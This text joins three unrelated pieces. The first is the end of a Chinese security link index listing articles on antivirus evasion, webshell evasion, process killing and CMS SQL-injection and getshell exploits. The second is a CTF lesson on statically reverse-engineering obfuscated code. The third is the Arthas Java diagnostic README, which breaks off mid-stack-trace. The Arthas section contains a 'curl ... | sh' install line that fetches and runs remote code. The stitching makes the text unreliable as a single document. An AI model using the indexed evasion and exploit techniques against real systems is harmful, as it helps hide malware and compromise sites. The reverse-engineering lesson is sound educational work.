[用Webshell直接杀入内网](http://www.91ri.org/11318.html) - 2014.11 [freebuf] [金玉其外败絮其中:百度杀毒“雪狼引擎”逆向分析](http://www.freebuf.com/articles/system/53021.html) - 2014.11 [jowto] [绕过百度杀毒溢出保护的一些方法](http://blog.jowto.com/?p=55) - 2014.11 [freebuf] [手机解锁用密码而不是Touch ID,纵容了杀妻嫌疑犯](http://www.freebuf.com/news/49942.html) - 2014.10 [] [SupeSite 通杀注射以及后台getshell](http://0day5.com/archives/2303/) - 2014.09 [freebuf] [深度:为什么Google急着杀死加密算法SHA-1](http://www.freebuf.com/news/topnews/44288.html) - 2014.08 [3xp10it] [管理员权限杀卡巴斯基进程](http://3xp10it.cc/web/2018/08/31/%E7%AE%A1%E7%90%86%E5%91%98%E6%9D%83%E9%99%90%E6%9D%80%E5%8D%A1%E5%B7%B4%E6%96%AF%E5%9F%BA%E8%BF%9B%E7%A8%8B/) - 2014.08 [3xp10it] [管理员权限杀卡巴斯基进程](http://3xp10it.cc/web/2018/08/31/%E7%AE%A1%E7%90%86%E5%91%98%E6%9D%83%E9%99%90%E6%9D%80%E5%8D%A1%E5%B7%B4%E6%96%AF%E5%9F%BA%E8%BF%9B%E7%A8%8B/) - 2014.08 [] [播放器暗藏远控木马 360独家提供查杀方案](http://blogs.360.cn/360safe/2014/08/15/trojan_in_media_player/) - 2014.07 [] [方维团购4.3最新版sql注入通杀4.2](http://0day5.com/archives/1864/) - 2014.07 [pediy] [[讨论]谈一谈,做一个杀毒软件,必备的Windows驱动程序](https://bbs.pediy.com/thread-189926.htm) - 2014.06 [] [phpok通杀前台getshell 4.0.515官方demo测试成功](http://0day5.com/archives/1820/) - 2014.05 [pediy] [[原创]简单实现MD5文件查杀](https://bbs.pediy.com/thread-188004.htm) - 2014.05 [] [动易系统通杀存储型XSS漏洞](http://0day5.com/archives/1690/) - 2014.05 [] [PHPCMS全版本通杀SQL注入漏洞](http://0day5.com/archives/1673/) - 2014.05 [freebuf] [赛门铁克想要重新发明杀毒软件](http://www.freebuf.com/news/33814.html) - 2014.04 [] [DedeCMS另一处全版本通杀SQL注入](http://0day5.com/archives/1542/) - 2014.04 [] [方维团购系统漏洞sql 通杀到最新4.2](http://0day5.com/archives/1475/) - 2014.03 [] [骑士人才(74CMS)3.X通杀XSS](http://0day5.com/archives/1419/) - 2014.03 [] [Destoon全版本通杀SQL注入](http://0day5.com/archives/1408/) - 2014.02 [freebuf] [DedeCMS全版本通杀SQL注入漏洞利用代码及工具](http://www.freebuf.com/sectool/27206.html) - 2014.02 [] [Dedecms 最新通杀注入分析](http://0day5.com/archives/1346/) - 2014.02 [freebuf] [号称可杀灭99.9%恶意程序的安全工具 – Rootkit Hunter](http://www.freebuf.com/sectool/25665.html) - 2014.02 [] [骑士cms人才系统 通杀SQL注入](http://0day5.com/archives/1240/) - 2014.02 [] [骑士cms人才系统 又一通杀](http://0day5.com/archives/1243/) - 2014.02 [] [macCMS 全版本通杀SQL注射(包括最新7.x)](http://0day5.com/archives/1226/) - 2014.01 [] [播放器暗藏远控木马 360独家提供查杀方案](http://blogs.360.cn/post/trojan_in_media_player.html) - 2014.01 [] [浏览器杀手 :“暗杀黑帮”木马的技术分析](http://blogs.360.cn/post/analysis_of_delbrwkiller.html) - 2014.01 [] [dedecms xss 0day通杀所有版本 可getshell](http://0day5.com/archives/1098/) - 2013.12 [] [金山软件wps2012-2013通杀漏洞](http://0day5.com/archives/996/) - 2013.11 [] [cmstop通杀注入漏洞](http://0day5.com/archives/897/) - 2013.11 [freebuf] [Google机器人被用于执行SQL注入攻击,通杀Web应用防火墙](http://www.freebuf.com/news/16509.html) - 2013.10 [] [Destoon最新全版本通杀SQL注入漏洞](http://0day5.com/archives/864/) - 2013.10 [] [ecmall 2.x通杀SQL注入漏洞分析及利用 附EXP](http://0day5.com/archives/811/) - 2013.09 [freebuf] [对国内各种安全卫士产品的一种通用虐杀、DLL注入、本地代码执行的方法](http://www.freebuf.com/vuls/12597.html) - 2013.08 [freebuf] [观点:杀毒软件,这样是否会更好?](http://www.freebuf.com/articles/others-articles/11718.html) - 2013.08 [] [encode msf shellcode绕过杀毒](http://www.91ri.org/6877.html) - 2013.07 [] [ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法](http://0day5.com/archives/652/) - 2013.07 [freebuf] [浅谈Android手机木马手工查杀](http://www.freebuf.com/articles/wireless/11175.html) - 2013.06 [u011069813] [在Android平台上发现新的恶意程序伪装成杀毒软件挟持设备](https://blog.csdn.net/u011069813/article/details/9167835) - 2013.06 [freebuf] [百度新推出杀毒软件“百度杀毒”评测](http://www.freebuf.com/news/10592.html) - 2013.06 [freebuf] [暗组Web杀毒 2.5 启发式查杀 0611 端午版](http://www.freebuf.com/sectool/10423.html) - 2013.06 [] [Gbbs微论坛拿shell通杀漏洞](http://0day5.com/archives/578/) - 2013.06 [pediy] [[原创]BD杀毒新版评测](https://bbs.pediy.com/thread-172892.htm) - 2013.04 [pediy] [[分享]对百度杀毒软件hook的一点分析[更1]](https://bbs.pediy.com/thread-168078.htm) - 2013.04 [] [最新易想团购系统通杀SQL注入漏洞分析附利用exp](http://0day5.com/archives/510/) - 2013.04 [freebuf] [易想团购系统通杀SQL注入漏洞分析及利用](http://www.freebuf.com/articles/web/8422.html) - 2013.04 [freebuf] [Anonymous组织在大屠杀纪念日展开对以色列的“屠杀”](http://www.freebuf.com/news/8358.html) - 2013.03 [freebuf] [Espcms通杀SQL注入漏洞分析(附EXP)](http://www.freebuf.com/articles/web/7623.html) - 2013.03 [pediy] [[原创] 360检测杀软分析](https://bbs.pediy.com/thread-165165.htm) - 2013.02 [] [dzX 2.0/2.5通杀0day 存储型XSS一枚](http://0day5.com/archives/386/) - 2013.02 [] [通达OA 2011-2013 通杀GETSHELL修复补丁](http://0day5.com/archives/357/) - 2013.01 [freebuf] [黑客亚伦·斯沃茨曾在自杀前119天发出过一些求助信息](http://www.freebuf.com/news/6868.html) - 2013.01 [freebuf] [26岁计算机黑客亚伦·斯沃茨自杀身亡](http://www.freebuf.com/news/6815.html) - 2012.12 [freebuf] [IE浏览器鼠标坐标跟踪安全风险,通杀全版本](http://www.freebuf.com/vuls/6470.html) - 2012.11 [freebuf] [堪比美剧!John McAfee否认谋杀,正在逃亡](http://www.freebuf.com/news/6251.html) - 2012.11 [] [phpweb成品网站全版本通杀注入漏洞](http://0day5.com/archives/227/) - 2012.11 [freebuf] [McAfee创始人涉嫌谋杀被通缉](http://www.freebuf.com/news/6217.html) - 2012.11 [pediy] [[原创]一病毒分析和杀毒](https://bbs.pediy.com/thread-158144.htm) - 2012.09 [freebuf] [杀毒软件将自己识别为恶意程序](http://www.freebuf.com/news/5733.html) - 2012.09 [jinzhuojun] [Windows中根据进程名找到进程并杀死](https://blog.csdn.net/jinzhuojun/article/details/7952983) - 2012.08 [pediy] [[原创]Android程序开机启动杀手Autorun Manager破解](https://bbs.pediy.com/thread-154746.htm) - 2012.07 [] [Wp暴目录漏洞-全版本通杀](http://0day5.com/archives/196/) - 2012.05 [] [正方软件现代教学管理系统通杀0day](http://0day5.com/archives/155/) - 2012.05 [] [ecshop后台最新拿shell方法,支持最新2.72版本。通杀最新版本后台低权限](http://0day5.com/archives/137/) - 2012.02 [pediy] [[原创]lpk.dll劫持病毒分析[附查杀工具及源码]](https://bbs.pediy.com/thread-147062.htm) - 2012.02 [] [通杀WIN服务器得明文密码神器](http://www.91ri.org/2857.html) - 2012.02 [pediy] [[原创]蠕虫专杀工具源码(VC)+蠕虫样本](https://bbs.pediy.com/thread-146134.htm) - 2011.12 [pediy] [[原创]谈谈 通杀SSDT hook和Shadow SSDT hook的方法](https://bbs.pediy.com/thread-143987.htm) - 2011.10 [] [社工秒杀hostloc](http://www.91ri.org/2282.html) - 2011.10 [pediy] [[原创]腾讯2008第三阶段专杀过程思路](https://bbs.pediy.com/thread-140920.htm) - 2011.08 [pediy] [[原创]ldj.exe的分析!并附上部分专杀代码](https://bbs.pediy.com/thread-138549.htm) - 2011.08 [pediy] [[原创]变形过云查杀](https://bbs.pediy.com/thread-138474.htm) - 2011.07 [pediy] [[原创]Delphi编写的LPK.DLL专杀,可清理RAR](https://bbs.pediy.com/thread-137601.htm) - 2011.04 [pediy] [[原创]暴力强杀进程代码](https://bbs.pediy.com/thread-132600.htm) - 2011.04 [pediy] [[原创]简单云查杀客户端源代码](https://bbs.pediy.com/thread-132163.htm) - 2011.04 [pediy] [[翻译]The Case of the Sysinternals-Blocking Malware——虚拟桌面程序来协助你手动杀毒](https://bbs.pediy.com/thread-131934.htm) - 2011.04 [pediy] [[原创]三线程防杀2测试(更新)原理已发布](https://bbs.pediy.com/thread-131749.htm) - 2011.03 [pediy] [[推荐]关于三线程防杀的一些思想和VC代码](https://bbs.pediy.com/thread-131537.htm) - 2011.02 [pediy] [[翻译]每周译闻——帮你杀毒的木马](https://bbs.pediy.com/thread-129839.htm) - 2011.02 [pediy] [[原创]蜘蛛纸牌 DIY 秒杀功能](https://bbs.pediy.com/thread-129704.htm) - 2011.02 [pediy] [[原创]流行杀毒软件对恶意PDF文档检测的概括性分析](https://bbs.pediy.com/thread-129690.htm) - 2011.02 [pediy] [[原创]对抗启发式查杀与虚拟机查杀](https://bbs.pediy.com/thread-129253.htm) - 2011.01 [pediy] [[原创]一招秒杀感染文件中的病毒代码](https://bbs.pediy.com/thread-128056.htm) - 2010.11 [pediy] [[原创]通过重映射+CRC32来过杀毒软件虚拟机的动态行为检查](https://bbs.pediy.com/thread-125011.htm) - 2010.11 [pediy] [[原创]病毒专杀编写攻略之ring3篇](https://bbs.pediy.com/thread-124103.htm) - 2010.09 [pediy] [[原创]提权大杀器源代码分析报告[最新修改]](https://bbs.pediy.com/thread-119809.htm) - 2010.08 [pediy] [[原创]一个弱脚本病毒分析查杀](https://bbs.pediy.com/thread-118841.htm) - 2010.08 [pediy] [[原创]多态性vs 云查杀](https://bbs.pediy.com/thread-118767.htm) - 2010.08 [pediy] [[原创]Worm.Parite.Residented 详细分析+专杀工具src](https://bbs.pediy.com/thread-117976.htm) - 2010.06 [pediy] [[原创]delphi版内核插apc杀进程代码](https://bbs.pediy.com/thread-115951.htm) - 2010.02 [pediy] [[原创]某杀毒软件 Create过滤函数中获得全路径的方法。](https://bbs.pediy.com/thread-107012.htm) - 2010.01 [pediy] [[原创]Delphi Virus.Win32.Induc.a 专杀的源代码](https://bbs.pediy.com/thread-104852.htm) - 2009.12 [pediy] [[原创]暴风一号蠕虫病毒专杀详解](https://bbs.pediy.com/thread-103929.htm) - 2009.12 [pediy] [[原创]发一个暴力杀进程小工具源代码](https://bbs.pediy.com/thread-103817.htm) - 2009.10 [pediy] [[原创]发个使用Native API的编程示例代码:LzOpenProcess杀冰刃](https://bbs.pediy.com/thread-98781.htm) - 2009.09 [pediy] [[调查]2009 看雪Crackme大赛杀手排行榜](https://bbs.pediy.com/thread-97370.htm) - 2009.09 [pediy] [[原创]DebugActiveProcess 杀进程](https://bbs.pediy.com/thread-96973.htm) - 2009.08 [pediy] [[原创]Delphi Virus.Win32.Induc.a 专杀](https://bbs.pediy.com/thread-96128.htm) - 2009.08 [pediy] [[原创]手工杀毒](https://bbs.pediy.com/thread-95785.htm) - 2009.08 [pediy] [code:PspTerminateProcess杀进程](https://bbs.pediy.com/thread-95033.htm) - 2009.08 [pediy] [code:插APC杀进程](https://bbs.pediy.com/thread-95032.htm) - 2009.07 [pediy] [[原创]用户层关闭瑞星2009杀毒软件安全保护](https://bbs.pediy.com/thread-94598.htm) - 2009.07 [pediy] [[分享]为了获得邀请码,拿出很久以前写的进程防杀](https://bbs.pediy.com/thread-93742.htm) - 2009.06 [pediy] [[原创]杀鸡焉用牛刀,再探好听音乐网](https://bbs.pediy.com/thread-92326.htm) - 2009.05 [pediy] [[原创]Ring3内存清0杀进程](https://bbs.pediy.com/thread-87620.htm) - 2008.10 [pediy] [[原创]PE感染逆向之修复(Serverx.exe专杀工具出炉手记)](https://bbs.pediy.com/thread-73948.htm) - 2008.09 [pediy] [[原创]一种新的杀毒思路](https://bbs.pediy.com/thread-72157.htm) - 2008.04 [pediy] [[原创]广义ESP定律秒杀PECompact](https://bbs.pediy.com/thread-63499.htm) - 2008.01 [pediy] [[原创]一段蛮古老的杀线程代码](https://bbs.pediy.com/thread-59091.htm) - 2007.11 [pediy] [[原创]多桌面切换程序-通杀所有网管程序](https://bbs.pediy.com/thread-55658.htm) - 2007.01 [pediy] [[原创]360最新cnnic专杀工具-360SuperKill“破冰”技术逆向分析](https://bbs.pediy.com/thread-38880.htm) - 2007.01 [pediy] [杀杀毒,灌灌水](https://bbs.pediy.com/thread-37387.htm) - 2006.05 [pediy] [杀vm里的3个小花的ollyscript脚本](https://bbs.pediy.com/thread-25084.htm) - 2006.02 [pediy] [[求助]关于catch22上自杀代码在GCC下的编译问题.](https://bbs.pediy.com/thread-20913.htm) - 2005.12 [pediy] [一个简单的自杀代码](https://bbs.pediy.com/thread-19899.htm) - 2005.08 [pediy] [出现错误对话框的杀手锏--暂停--初学者适用](https://bbs.pediy.com/thread-16147.htm) - 2005.08 [pediy] [[原创]《图章制作系统 V3.63》脱壳去校验解除自杀代码[分析篇]](https://bbs.pediy.com/thread-15801.htm) - 2004.05 [pediy] [穿山甲小牛试刀之一+秒杀N层马甲之Nnewell的某KeyGenMe](https://bbs.pediy.com/thread-989.htm) *** ## <a id="b2d27225ff6394904396a2594c6df5e3"></a>远控免杀从入门到实践 - 2020.03 [freebuf] [远控免杀从入门到实践(8)-shellcode免杀实践](https://www.freebuf.com/articles/system/228233.html) - 2020.03 [freebuf] [远控免杀从入门到实践(7)-代码篇-Golang+Ruby](https://www.freebuf.com/articles/system/227468.html) - 2020.03 [freebuf] [远控免杀从入门到实践(6)-代码篇-Powershell](https://www.freebuf.com/articles/system/227467.html) - 2020.03 [freebuf] [远控免杀从入门到实践(5)-代码篇-Python](https://www.freebuf.com/articles/system/227466.html) - 2020.03 [freebuf] [远控免杀从入门到实践(4):代码篇-C#](https://www.freebuf.com/articles/system/227464.html) - 2020.03 [freebuf] [远控免杀从入门到实践(3)-代码篇-C/C++](https://www.freebuf.com/articles/system/227463.html) - 2020.02 [freebuf] [远控免杀从入门到实践(一):基础篇](https://www.freebuf.com/articles/system/227461.html) *** ## <a id="b661c2ec8b7476a5c8e3937213995385"></a>恶意代码 - 2019.10 [HackersOnBoard] [Black Hat USA 2016 AVLeak Fingerprinting Antivirus Emulators for Advanced Malware Evasion](https://www.youtube.com/watch?v=9U5FXN2iIo0) - 2019.06 [arxiv] [[1906.10625] Antiforensic techniques deployed by custom developed malware in evading anti-virus detection](https://arxiv.org/abs/1906.10625) - 2018.03 [ensilo] [AV-TEST Verifies that the Next Generation Antivirus Features of the enSilo Endpoint Security Platform Deliver 100% Pre-Infection Malware Protection](https://blog.ensilo.com/av-test-verifies-that-the-next-generation-antivirus-features-of-the-ensilo-endpoint-security-platform-deliver-100-pre-infection-malware-protection) - 2018.02 [heimdalsecurity] [Security Alert: Hancitor Trojan Downloader Evades AV Detection, Drops Malware Cocktail](https://heimdalsecurity.com/blog/security-alert-hancitor-trojan-downloader-drops-malware-cocktail/) - 2017.11 [securityintelligence] [使用 AutoIt 脚本绕过 AV 检测的远控分析](https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/) - 2017.09 [360] [重磅!一种恶意软件绕过杀软的新方法](https://www.anquanke.com/post/id/86886/) - 2017.05 [4hou] [免杀新姿势:利用线程将恶意代码注入到内存中](http://www.4hou.com/technology/4819.html) - 2016.10 [emsisoft] [Emsisoft Anti-Malware earns Advanced+ rating in AV-Comparatives Performance Test](https://blog.emsisoft.com/en/24486/emsisoft-anti-malware-earns-advanced-rating-in-av-comparatives-performance-test/) - 2016.10 [emsisoft] [Emsisoft Anti-Malware rated top performer in AV-Comparatives Scanner Test](https://blog.emsisoft.com/en/24158/emsisoft-anti-malware-rated-top-performer-in-av-comparatives-scanner-test/) - 2015.07 [paloaltonetworks] [New Android Malware Family Evades Antivirus Detection by Using Popular Ad](https://unit42.paloaltonetworks.com/new-android-malware-family-evades-antivirus-detection-by-using-popular-ad-libraries/) - 2015.04 [bogner] [How Malware Evades Antivirus Detection](https://bogner.sh/2015/04/how-to-evade-antivirus-detection/) - 2015.04 [duo] [Banking Malware Targets Wire Transfers; Evades Antivirus](https://duo.com/blog/banking-malware-targets-wire-transfers-evades-antivirus) - 2015.02 [lastline] [Carbanak Malware — Ninety Five Percent Exhibits Stealthy or Evasive Behaviors](https://www.lastline.com/labsblog/carbanak-malware-ninety-five-percent-exhibits-stealthy-or-evasive-behaviors/) - 2014.07 [malwarebytes] [Malwarebytes Anti-Malware Free scores 100% in AV-TEST removal test!](https://blog.malwarebytes.com/malwarebytes-news/2014/07/malwarebytes-anti-malware-free-scores-100-in-av-test-removal-test/) - 2014.04 [emsisoft] [Emsisoft Anti-Malware Scores Advanced+ Rating in AV-Comparatives File Detection Test](https://blog.emsisoft.com/en/6326/emsisoft-anti-malware-scores-advanced-plus-rating-in-av-comparatives-file-detection-test-2/) - 2013.12 [freebuf] [恶意软件伪装成IIS模块加载,多数防毒产品免杀](http://www.freebuf.com/articles/web/19798.html) - 2010.05 [sans] [Malware modularization and AV detection evasion](https://isc.sans.edu/forums/diary/Malware+modularization+and+AV+detection+evasion/8857/) - 2010.05 [elearnsecurity] [Malware can bypass all Windows based AV’s](https://blog.elearnsecurity.com/malware-can-bypass-all-windows-based-avs.html) *** ## <a id="e92db1d2247da3a2fd0fce167afbac6a"></a>webshell - 2020.02 [aliyun] [Webshell免杀研究](https://xz.aliyun.com/t/7151) - 2019.11 [aliyun] [绕过WebShell检测的总结之文件免杀](https://xz.aliyun.com/t/6784) - 2019.05 [aliyun] [对于asp免杀webshell的一些总结](https://xz.aliyun.com/t/5193) - 2019.05 [aliyun] [对于php免杀webshell的一些总结](https://xz.aliyun.com/t/5152) - 2017.01 [freebuf] [绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)](http://www.freebuf.com/articles/web/125084.html) - 2014.08 [3xp10it] [unserialize免杀webshell](http://3xp10it.cc/web/2017/04/18/unserialize%E5%85%8D%E6%9D%80webshell/) - 2014.08 [3xp10it] [php中&引用免杀webshell](http://3xp10it.cc/web/2017/04/25/php%E4%B8%AD&%E5%BC%95%E7%94%A8%E5%85%8D%E6%9D%80/) - 2014.08 [3xp10it] [unserialize免杀webshell](http://3xp10it.cc/web/2017/04/18/unserialize%E5%85%8D%E6%9D%80webshell/) - 2014.08 [3xp10it] [php中&引用免杀webshell](http://3xp10it.cc/web/2017/04/25/php%E4%B8%AD&%E5%BC%95%E7%94%A8%E5%85%8D%E6%9D%80/) - 2013.08 [] [Webshell过安全狗的几种技巧[附特征免杀法]](http://www.91ri.org/7135.html) # 贡献 内容为系统自动导出, 有任何问题请提issue
# Static Code Reverse Engineering Many malicious actors obfuscate their code so that their techniques and identity can evade detection even if their malicious code is caught and analyzed. Or, some benign coders obfuscate their code in order to protect their proprietary coding algorithms. It's hard to look at obfuscated code and know what it does, so as security enthusiasts, we can learn the skills necessary to be successful in decoding code! **NEVER** run ANY code (doesn't matter the coding language) in a production desktop or server unless you know what the code does. Now, of course there are exceptions-- we don't really know what Microsoft Office, Adobe Photoshop or Sophos runs in their code on their software. However, since they are a **reputable company** it's usually safe to trust and run their code. If you find suspicious code and you don't know what it does, either run the code in a Sandbox environment or statically examine the code. *This lesson covers statically examining code.* ## Tips for Success 1. Understand the syntax of the coding language 2. \* Check what the program accepts as input arguments 3. Check what the program delivers as output 4. Understand what each standard library function does 5. Check strings in the program 6. Check conditionals (if statements) *Notice: when running a program from the command line, the program passes command-line arguments in the `sys.argv` array. This array is accessible in the program at run-time. For example, in the command ```linux python3 combine.py Amanda Green ``` `sys.argv[0]` is the name of the file being run (combine.py) `sys.argv[1]` is the first string after then name of the file (Amanda) `sys.argv[2]` follows the sys.argv[1] (Green) etc. Sys.argv[] is exclusive to Python, but other languages have similar concepts. [C++ uses argc and argv](https://www.geeksforgeeks.org/command-line-arguments-in-c-cpp/) ## JavaScript Reverse Engineering Since JavaScript is so often obfuscated for both benign and malicious purpose, there are some online tools to help in the reverse engineering process: - [obfuscator.io](https://obfuscator.io/) : Obfuscates JavsScript - [JS Beautify](https://beautifier.io/) : Normalizes and does some preliminary deobfuscation on Javascript - [JS Nice](http://www.jsnice.org/) : Similar to JS Beautify. Sometimes it performs better or worse than JS Beautify - [JS Console](https://jsconsole.com/): Online JavaScript console. Especially helpful to run modifying commands on strings, such as atob() or escape() - [HackTheBox JavaScript Deobfuscation Course](https://academy.hackthebox.com/module/41/section/449): A HTB course that teaches JavaScript Deobfuscation and Reverse Engineering techniques. ### Practice Reverse Engineering JavaScript - [FakeLoginExample.html](FakeLoginExample.html) - [reverseJavaScriptExample.js](reverseJavaScriptExample.js) - [reverseJavascriptPractice.js](reverseJavascriptPractice.js) ## Python Reverse Engineering ### Practice Reverse Engineering Python - [reversePython1.py](reversePython1.py) - [reversePython2.py](reversePython2.py) ## Additional Sources - [A Quick Guide to Reverse Engineering Malware](https://www.eccouncil.org/cybersecurity-exchange/ethical-hacking/malware-reverse-engineering/): An article on quick steps for reverse engineering malware. This is the most practical use for reverse engineering in the Info Sec industry. - [Command Line Arguments in C/C++](https://www.geeksforgeeks.org/command-line-arguments-in-c-cpp/): A GeeksForGeeks article that explains more about how command line arguments can be passed into running code in C and C++. - [Intro to Reverse Engineering with Memory Analysis](https://github.com/BYU-CSA/ctf-training/tree/main/Lesson%2005%20-%20Intro%20to%20Reverse%20Engineering): Another lesson in this Github that has additional information about Reverse Engineering by focusing on the memory execution model. - [Introduction to Ghidra](https://github.com/BYU-CSA/ctf-training/tree/main/Lesson%2011%20-%20Ghidra): Another lesson in this GitHub that is an introduction to Ghidra, which is a tool developed and maintained by the NSA that can be used to generate static code from compiled code.
## Arthas ![arthas](site/src/site/sphinx/arthas.png) [![Build Status](https://travis-ci.org/alibaba/arthas.svg?branch=master)](https://travis-ci.org/alibaba/arthas) [![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas) ![maven](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg) ![license](https://img.shields.io/github/license/alibaba/arthas.svg) [![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Average time to resolve an issue") [![Percentage of issues still open](http://isitmaintained.com/badge/open/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Percentage of issues still open") `Arthas` is a Java Diagnostic tool open sourced by Alibaba. Arthas help developers in trouble-shooting production issues for Java applications without modifying code or restarting servers. [中文说明](README_CN.md) (For Chinese Documentation) ### Background Often times, the production system network is inaccessible from local development environment. If issues are encountered in production systems, it is impossible to use IDE to debug the application remotely. More importantly, debugging in production environment is unacceptable, as it will suspend all the threads, which leads to blocking of business services. Developers could always try to reproduce the same issue on the test/staging environment. However, this is tricky as some issues cannot be be reproduced easily on a different environment, or even disappear once restarted. And if you're thinking of adding some logs to your code to help trouble-shoot the issue, you will have to go through the following lifecycle; test, staging, and then to production. Time is money! This approach is inefficient! Besides, the issue may not be reproducible once the JVM is restarted, as described above. Arthas was built to solve these issues. A developer can trouble-shoot your production issues on-the-fly. No JVM restart, no additional code changes. Arthas works as an observer, which will never suspend your existing threads. ### Key features * Check whether a class is loaded? Or where the class is loaded from? (Useful for trouble-shooting jar file conflicts) * Decompile a class to ensure the code is running as expected. * View classloader statistics, e.g. the number of classloaders, the number of classes loaded per classloader, the classloader hierarchy, possible classloader leaks, etc. * View the method invocation details, e.g. method parameter, return object, thrown exception, and etc. * Check the stack trace of specified method invocation. This is useful when a developers wants to know the caller of the said method. * Trace the method invocation to find slow sub-invocations. * Monitor method invocation statistics, e.g. qps, rt, success rate and etc. * Monitor system metrics, thread states and cpu usage, gc statistics, and etc. * Supports command line interactive mode, with auto-complete feature enabled. * Supports telnet and websocket, which enables both local and remote diagnostics with command line and browsers. * Supports JDK 6+ ### Quick start #### Linux/Unix/Mac Install Arthas: ``` curl -L https://alibaba.github.io/arthas/install.sh | sh ``` Start Arthas: ``` ./as.sh ``` #### Windows 1. Click [![Arthas](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg "Arthas")](http://repository.sonatype.org/service/local/artifact/maven/redirect?r=central-proxy&g=com.taobao.arthas&a=arthas-packaging&e=zip&c=bin&v=LATEST) to download the latest binary releases of `bin.zip`. 2. Unzip the file. 3. Go to the bin directory 4. Run the following command `as.bat $PID` ### Documentation * [User manual](https://alibaba.github.io/arthas/en) * [Installation](https://alibaba.github.io/arthas/en/install-detail.html) * [Quick start](https://alibaba.github.io/arthas/en/quick-start.html) * [Advanced usage](https://alibaba.github.io/arthas/en/advanced-use.html) * [Commands](https://alibaba.github.io/arthas/en/commands.html) * [User cases](https://github.com/alibaba/arthas/issues?q=label%3Auser-case) * [Questions and answers](https://github.com/alibaba/arthas/issues?utf8=%E2%9C%93&q=label%3Aquestion-answered+) * [How to contribute](https://github.com/alibaba/arthas/blob/master/CONTRIBUTING.md) * [Release Notes](https://alibaba.github.io/arthas/en/release-notes.html) ### Feature Showcase #### Dashboard * https://alibaba.github.io/arthas/en/dashboard ![dashboard](site/src/site/sphinx/_static/dashboard.png) #### Thread See what is eating your cpu (ranked by top cpu usage) and what is going on there in one glance: ``` $ thread -n 3 "as-command-execute-daemon" Id=29 cpuUsage=75% RUNNABLE at sun.management.ThreadImpl.dumpThreads0(Native Method) at sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:440) at com.taobao.arthas.core.command.monitor200.ThreadCommand$1.action(ThreadCommand.java:58) at com.taobao.arthas.core.command.handler.AbstractCommandHandler.execute(AbstractCommandHandler.java:238) at com.taobao.arthas.core.command.handler.DefaultCommandHandler.handleCommand(DefaultCommandHandler.java:67) at com.taobao.arthas.core.server.ArthasServer$4.run(ArthasServer.java:276) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) Number of locked synchronizers = 1 - java.util.concurrent.ThreadPoolExecutor$Worker@6cd0b6f8 "as-session-expire-daemon" Id=25 cpuUsage=24% TIMED_WAITING at java.lang.Thread.sleep(Native Method) at com.taobao.arthas.core.server.DefaultSessionManager$2.run(DefaultSessionManager.java:85) "Reference Handler" Id=2 cpuUsage=0% WAITING on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Native Method) - waiting on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Object.java:503) at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:133) ``` #### jad Decompile your class with one shot: ```java $ jad javax.servlet.Servlet ClassLoader: +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 Location: /Users/xxx/work/test/lib/servlet-api.jar /* * Decompiled with CFR 0_122. */ package javax.servlet; import java.io.IOException; import javax.servlet.ServletConfig; import javax.servlet.ServletException; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; public interface Servlet { public void init(ServletConfig var1) throws ServletException; public ServletConfig getServletConfig(); public void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException; public String getServletInfo(); public void destroy(); } ``` #### sc Search any loaded class with detailed information. ``` $ sc -d org.springframework.web.context.support.XmlWebApplicationContext class-info org.springframework.web.context.support.XmlWebApplicationContext code-source /Users/xxx/work/test/WEB-INF/lib/spring-web-3.2.11.RELEASE.jar name org.springframework.web.context.support.XmlWebApplicationContext isInterface false isAnnotation false isEnum false isAnonymousClass false isArray false isLocalClass false isMemberClass false isPrimitive false isSynthetic false simple-name XmlWebApplicationContext modifier public annotation interfaces super-class +-org.springframework.web.context.support.AbstractRefreshableWebApplicationContext +-org.springframework.context.support.AbstractRefreshableConfigApplicationContext +-org.springframework.context.support.AbstractRefreshableApplicationContext +-org.springframework.context.support.AbstractApplicationContext +-org.springframework.core.io.DefaultResourceLoader +-java.lang.Object class-loader +-org.apache.catalina.loader.ParallelWebappClassLoader +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 classLoaderHash 25131501 ``` #### stack View the call stack of `test.arthas.TestStack#doGet`: ``` $ stack test.arthas.TestStack doGet Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 286 ms. ts=2018-09-18 10:11:45;thread_name=http-bio-8080-exec-10;id=d9;is_daemon=true;priority=5;TCCL=org.apache.catalina.loader.ParallelWebappClassLoader@25131501 @test.arthas.TestStack.doGet() at javax.servlet.http.HttpServlet.service(HttpServlet.java:624) at javax.servlet.http.HttpServlet.service(HttpServlet.java:731) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220) at 